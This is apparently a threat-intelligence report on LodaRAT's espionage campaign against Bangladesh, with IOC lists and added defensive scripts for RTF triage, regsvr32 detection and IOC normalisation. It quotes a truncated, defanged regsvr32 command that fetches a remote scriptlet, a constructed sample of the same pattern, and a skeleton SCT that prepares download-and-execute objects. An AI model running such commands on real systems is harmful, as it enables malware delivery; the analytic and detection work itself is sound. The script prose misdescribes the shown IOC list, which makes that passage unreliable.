
The Bangladesh campaign – Kasablanka Group’s LodaRAT

Introduction

The LodaRAT activity described here is linked to a specific campaign against Bangladesh.
Kasablanka, the group behind LodaRAT, appears to be motivated by information gathering and espionage rather than direct financial gain.

Talos has identified activity starting in October 2020. The activity is still in progress and currently targets both Windows and Android platforms. The domain info.v-pn[.]co was first seen in use as Loda's C2 on July 2, 2020, the same day the domain was registered. Since then this host has been used for Loda-related malicious activity, and over the past seven months it has resolved to several different IPs.

The Windows version uses the IP 107.172.30[.]213 as its staging site, which hosts the first-stage script and the main payload.

For this campaign, the threat actors used the IP address 160.178.220[.]194 as the hosting site for the Windows and Android versions in the early stages, and subsequently changed their C2 to info.v-pn[.]co.

Based on the certificate fingerprints used to sign the two Android samples, we believe that the C2 was recently changed to info.v-pn[.]co and that the samples are now being distributed from the new domain lap-top[.]xyz.

A development version signed with the same certificate (which uses the internal RFC 1918 address 192.168.1.169 as its C2) was anonymously submitted to VirusTotal from the same geographic area of Morocco as the geolocation of the IP used in the early stages of this campaign (160.178.220[.]194). This suggests that the developers of Loda4Android may be located in Morocco.

Infection vector

The attacker uses a malicious RTF document that exploits CVE-2017-11882 to download a malicious SCT file.

The files analyzed during this investigation did not use any obfuscation. The exploit payload is stored in plain text and can easily be inspected.
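A document that exploits CVE-2017-11882 has to embed an Equation Editor OLE object, so the first triage step for an RTF like the one above is to decode the hex behind \objdata and look for the Equation ProgID or its CLSID. The script below is an added example, not code from the original analysis: it builds a constructed RTF (an OLE 1.0 ObjectHeader laid out per MS-OLEDS, naming Equation.3, with no exploit data) and scans it. The \objupdate check is included because that control word forces the object to load when the document is opened.

```python
"""Triage an RTF file for embedded Equation Editor objects, the component
abused by CVE-2017-11882. Added example; the RTF it builds is constructed
and carries only the object markers a scanner looks for, not an exploit."""
import re

# Equation Editor ProgIDs and its CLSID {0002CE02-0000-0000-C000-000000000046},
# written in the little-endian byte order used inside OLE streams.
EQUATION_PROGIDS = (b"equation.2", b"equation.3")
EQUATION_CLSID_LE = bytes.fromhex("02ce020000000000c000000000000046")

# \objdata is followed by the OLE object as a hex string, often split across lines.
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")


def extract_objects(rtf: bytes) -> list[bytes]:
    """Decode every \\objdata hex blob in the document."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb"\s+", b"", m.group(1))
        hexdata = hexdata[: len(hexdata) // 2 * 2]      # drop a dangling nibble
        blobs.append(bytes.fromhex(hexdata.decode("ascii")))
    return blobs


def triage_rtf(rtf: bytes) -> dict:
    """Flag Equation Editor objects by control word, ProgID or CLSID."""
    lowered = rtf.lower()
    report = {
        "objclass_equation": any(p in lowered for p in EQUATION_PROGIDS),  # \objclass Equation.3
        "objupdate": b"\\objupdate" in lowered,    # forces the object to load on open
        "objects": [],
    }
    for blob in extract_objects(rtf):
        report["objects"].append({
            "size": len(blob),
            "progid_in_data": any(p in blob.lower() for p in EQUATION_PROGIDS),
            "clsid_in_data": EQUATION_CLSID_LE in blob,
        })
    report["suspicious"] = report["objclass_equation"] or any(
        o["progid_in_data"] or o["clsid_in_data"] for o in report["objects"])
    return report


def build_sample_rtf() -> bytes:
    """Constructed RTF with an OLE 1.0 ObjectHeader (MS-OLEDS) naming Equation.3."""
    header = bytes.fromhex("01050000" "02000000")            # OLEVersion, FormatID=embedded
    header += (11).to_bytes(4, "little") + b"Equation.3\x00"  # length-prefixed class name
    header += (0).to_bytes(4, "little") * 2                   # empty TopicName, ItemName
    native = EQUATION_CLSID_LE + b"\x00" * 16                 # stand-in for NativeData
    header += len(native).to_bytes(4, "little") + native
    return (b"{\\rtf1{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}"
            b"{\\*\\objdata " + header.hex().encode() + b"}}}")


if __name__ == "__main__":
    print(triage_rtf(build_sample_rtf()))
```

A hit on any of these markers means the document deserves a closer look, not that it is exploiting the bug: legitimate documents with equations carry the same object. Real exploit documents also often omit \objclass and rely on the ProgID inside the hex blob, which is why the scan decodes \objdata instead of trusting the control words alone.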

[Image: the malicious RTF document's plain-text exploit payload]

The second stage of the infection chain reuses a technique previously seen in Loda campaigns. As shown above, the payload runs the following command:

regsvr32 /s /u /n /i:hxxp://107[.]172[.]30[.]

This is a well-known technique on Windows that bypasses AppLocker by abusing the regsvr32 command. Because regsvr32 is a Microsoft-signed binary that default application-control rules allow, an attacker can use it to download and execute an SCT file from a remote URL while bypassing AppLocker.

The malicious SCT file is essentially an XML file containing JavaScript that downloads and executes the Loda binary.
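The regsvr32 pattern above is easy to catch in process-creation telemetry, and the SCT file's XML shape makes it easy to inspect. The script below is an added example, not part of the original analysis: it tags command lines that point regsvr32 at a remote scriptlet and inspects a scriptlet for the COM objects a download-and-execute stage needs. The process records and the SCT are constructed (203.0.113.10 is a documentation address and the classid is a placeholder), not samples from this campaign.

```python
"""Detection logic for the regsvr32 scriptlet (Squiblydoo) pattern and a
quick inspection of an SCT file. Added example; the process records and the
SCT below are constructed, not samples from the campaign."""
import re
import xml.etree.ElementTree as ET

REGSVR32_RE = re.compile(r'(?:^|[\\\s"])regsvr32(?:\.exe)?\b', re.I)
INSTALL_ARG_RE = re.compile(r'[/-]i:"?([^\s"]+)', re.I)
SWITCH_RE = re.compile(r"(?:^|\s)[/-]([sun])(?=\s|$)", re.I)

# COM ProgIDs a scriptlet needs for fetch-and-execute behaviour.
SUSPICIOUS_PROGIDS = ("WScript.Shell", "Shell.Application", "MSXML2.XMLHTTP",
                      "Microsoft.XMLHTTP", "ADODB.Stream")


def analyze_regsvr32(cmdline: str) -> list[str]:
    """Return detection tags for a process command line (empty if benign)."""
    tags = []
    if not REGSVR32_RE.search(cmdline):
        return tags
    switches = {s.lower() for s in SWITCH_RE.findall(cmdline)}
    m = INSTALL_ARG_RE.search(cmdline)
    target = m.group(1) if m else ""
    if re.match(r"https?://", target, re.I):
        tags.append("remote_scriptlet")          # /i: points at a URL
    if "scrobj.dll" in cmdline.lower():
        tags.append("scrobj_dll")                # scriptlet COM server loaded
    if target and {"u", "n"} <= switches:
        tags.append("squiblydoo_switches")       # /u /n /i: -> only DllInstall runs
    return tags


def analyze_sct(xml_text: str) -> dict:
    """Extract script languages and COM objects referenced by an SCT file."""
    root = ET.fromstring(xml_text)
    languages, progids = [], []
    for script in root.iter("script"):
        languages.append(script.get("language", ""))
        body = (script.text or "").lower()
        progids.extend(p for p in SUSPICIOUS_PROGIDS if p.lower() in body)
    return {"languages": languages, "com_objects": sorted(set(progids))}


# Constructed process records; 203.0.113.10 is a documentation address.
SAMPLE_CMDLINES = [
    r'regsvr32 /s /u /n /i:http://203.0.113.10/stage1.sct scrobj.dll',
    r'regsvr32 /s "C:\Program Files\Vendor\vendor.dll"',
    r'C:\Windows\System32\notepad.exe C:\Users\user\notes.txt',
]

# Constructed scriptlet with the shape regsvr32 /i: consumes; the classid is a placeholder.
SAMPLE_SCT = """<?xml version="1.0"?>
<scriptlet>
  <registration progid="Example.Sct" classid="{00000000-1111-2222-3333-444444444444}">
    <script language="JScript"><![CDATA[
      var http = new ActiveXObject("MSXML2.XMLHTTP");
      var shell = new ActiveXObject("WScript.Shell");
      // a real sample would download a binary here and run it via shell.Run
    ]]></script>
  </registration>
</scriptlet>"""


def run_samples() -> dict:
    """Run both analyzers over the constructed input."""
    return {
        "cmdlines": {c: analyze_regsvr32(c) for c in SAMPLE_CMDLINES},
        "sct": analyze_sct(SAMPLE_SCT),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(run_samples(), indent=2))
```

The three tags are deliberately separate: a remote /i: target alone is the strongest signal, while /u /n without a URL appears in legitimate uninstall commands, so the rule that pages an analyst should require the URL and treat the other two as corroboration.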

IOCs

URLs

hxxps://lap-top[.]xyz/mobile/Lap-top%20Security_Setup.apk
hxxps://av24[.]co/Virus_Cleaner_Setup.msi
hxxp://bdpolice[.]co/answer-paper-demo.zip
hxxps://isiamibankbd[.]com/tv/TPTUMC.exe
hxxps://bangladesh-bank[.]com/PBVANA.doc
hxxp://bangladesh-bank[.]com/invoice.zip
hxxp://zep0de[.]com/viewticket.exe
hxxp://bracbank[.]info/munafa[.]php
hxxp://107[.]172[.]30[.]213/Flash.exe

Domains

info.v-pn[.]co
lap-top[.]xyz
av24[.]co
bdpolice[.]co
isiamibankbd[.]com
bangladesh-bank[.]com
zep0de[.]com
bracbank[.]info

IP addresses

160.178.220[.]194
194.5.98[.]55
107.172.30[.]213

SHA-1 hashes

cbbcef863a6e7865027ff358cf1a6dcdeaad0d36
c01ae69b433269bcc2fd30d2b9c8576041263ce9
9bcd9a33c051d36ab0acec41e37d394025982822
f8ea2215496e6ead5135cf0ff4936cdb11208c37
acdc857fc24b72927b550e365eb4d77f385b6a4d
0239655de78351669cb0d351accb9dbe858b4347
0d1ae8971ec43ba43cc58ee7d3e22ffa3ad278b2
78a5dbe3c8cd70f514d1854013c30d56240e34ad
e7d5f4dc247270747a170bf6b3575f8523b5520c
af45e8a08dc3666996223dc4794bbdf9beff6bec
99ee00c87c5631c1d70610f42951b3acf54b4a20
dad1cb6cf834896d90f4eda7ee7d2910bd762841
3e1b9638427c9a11ad6bc55a58f876a44c0e4bf5

MD5 hashes

6cfc723111d7001f8c14f0cd397dbd44
c39fc85c03b20e888abbd13678f9efe7
9b6b7f85c64ca54c9f755554d5af5a47
c7dfd9ada76552be7d8a566f39066702
9a0f72cdc9a2846da937676e1efe8bf4
90387cfd4c6ebfd992e383d6d66bf458
35a3319dcba68678d4e94c039780d4c1
afcc83d0b6bb0e71d04fb54db253a9d9
50ee8d6a24c1e29d184ecec1eb205ecf
ec8d1d6562a210daac931879acbca7c4
8c8b50499149c2ad20ba39a3a607423c
461e4b3868aede5b44578441ed352268
01ee65abddc83d85f56e646a77abdf81
09600ffd3bbfad0e397b2c4bf04037c5
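Before this list is loaded into a blocklist or a SIEM watchlist it has to be refanged, typed and de-duplicated; the entries above show the two pitfalls (one domain was left un-defanged, and one appears with different capitalisation). The script below is an added example, not part of the original report: it normalises a defanged IOC list into typed sets, deriving host entries from URLs as well. The sample input reuses a handful of the indicators above plus a capitalised duplicate to exercise those cases.

```python
"""Normalise a defanged IOC list into typed, de-duplicated sets. Added example;
the list below mixes entries in the page's own format (hxxp, [.]) with an
un-defanged domain and a capitalised duplicate, to exercise those edge cases."""
import ipaddress
import re
from urllib.parse import urlsplit

HASH_KINDS = {32: "md5", 40: "sha1", 64: "sha256"}
DOMAIN_RE = re.compile(r"(?=.{1,253}$)(?:[a-z0-9-]+\.)+[a-z]{2,}", re.I)


def refang(value: str) -> str:
    """Undo common defanging so the value can be matched against real telemetry."""
    v = value.strip()
    v = re.sub(r"^hxxp", "http", v, flags=re.I)
    return v.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")


def classify(value: str) -> tuple[str, str]:
    """Return (kind, normalised value); kind is md5/sha1/sha256/url/ip/domain/unknown."""
    v = refang(value)
    if len(v) in HASH_KINDS and re.fullmatch(r"[0-9a-f]+", v, re.I):
        return HASH_KINDS[len(v)], v.lower()
    if re.match(r"https?://", v, re.I):
        return "url", v
    try:
        return "ip", str(ipaddress.ip_address(v))
    except ValueError:
        pass
    if DOMAIN_RE.fullmatch(v):
        return "domain", v.lower()
    return "unknown", v


def parse_ioc_list(text: str) -> dict:
    """Group IOCs by kind; hosts inside URLs are also added as domain/ip entries."""
    groups: dict[str, set] = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        kind, norm = classify(line)
        groups.setdefault(kind, set()).add(norm)
        if kind == "url":
            host = urlsplit(norm).hostname or ""
            hkind, hnorm = classify(host)
            groups.setdefault(hkind, set()).add(hnorm)
    return {k: sorted(v) for k, v in groups.items()}


# Constructed input: a subset of the indicators above, plus a capitalised duplicate.
SAMPLE_IOCS = """
hxxps://lap-top[.]xyz/mobile/Lap-top%20Security_Setup.apk
hxxp://107[.]172[.]30[.]213/Flash.exe
info.v-pn[.]co
zep0de.com
Bracbank[.]info
bracbank[.]info
160.178.220[.]194
cbbcef863a6e7865027ff358cf1a6dcdeaad0d36
6cfc723111d7001f8c14f0cd397dbd44
"""

if __name__ == "__main__":
    for kind, values in parse_ioc_list(SAMPLE_IOCS).items():
        print(kind, values)
```

Anything that lands in the "unknown" bucket should be reviewed by hand rather than dropped; a typo in a defanged entry is the usual cause. Hash type is inferred from length only, which is adequate for a list like this one but should be confirmed against the source when a feed mixes algorithms.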